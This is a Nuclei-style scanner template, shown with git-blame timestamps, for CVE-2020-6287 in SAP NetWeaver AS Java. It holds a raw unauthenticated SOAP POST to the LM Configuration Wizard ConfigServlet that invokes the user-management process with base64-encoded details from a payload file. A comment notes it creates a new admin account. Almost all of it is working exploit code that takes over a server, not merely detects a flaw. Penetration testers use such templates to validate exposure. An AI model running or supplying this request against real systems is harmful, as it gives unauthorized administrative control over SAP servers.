2020-07-21 06:53:00 +00:00
|
|
|
id: CVE-2020-6287
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Create an Administrative User in SAP NetWeaver AS JAVA (LM Configuration Wizard)
|
|
|
|
author: dwisiswant0
|
|
|
|
severity: critical
|
|
|
|
|
|
|
|
# Affected Versions: 7.30, 7.31, 7.40, 7.50
|
|
|
|
|
|
|
|
# p.s:
|
|
|
|
# > Don't forget to change the default credentials
|
|
|
|
# > to create new admin in associated file:
|
|
|
|
# > `payloads/CVE-2020-6287.xml`
|
|
|
|
|
|
|
|
# Ref:
|
|
|
|
# - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6287
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- payloads:
|
|
|
|
data: "payloads/CVE-2020-6287.xml"
|
|
|
|
raw:
|
|
|
|
- |
|
|
|
|
POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: text/xml; charset=UTF-8
|
2020-07-21 08:00:14 +00:00
|
|
|
Connection: close
|
2020-07-21 06:53:00 +00:00
|
|
|
|
2020-07-31 16:21:48 +00:00
|
|
|
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>{{base64('data')}}</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>
|
2020-07-21 06:53:00 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "urn:CTCWebServiceSi"
|
|
|
|
part: body
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|